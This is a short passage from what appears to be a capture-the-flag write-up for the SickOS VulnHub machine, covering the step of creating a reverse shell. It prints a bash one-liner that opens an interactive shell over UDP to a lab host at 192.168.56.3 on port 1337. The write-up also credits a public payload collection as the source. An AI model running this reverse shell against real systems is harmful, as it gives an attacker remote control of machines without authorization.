xuiki/CTF-HTB-Writeups/2109-SickOS_VulnHub_Writeup.md

 # 6. Creating a Reverse Shell

 - Using a shell will allow us to navigate more efficiently.
 So we can upload a file named test.sh with this script in the body:

   ```bash
   sh -i >& /dev/udp/192.168.56.3/1337 0>&1
   ```

+  > This Bash UDP Reverse shell payload can be found on https://github.com/swisskyrepo/PayloadsAllTheThings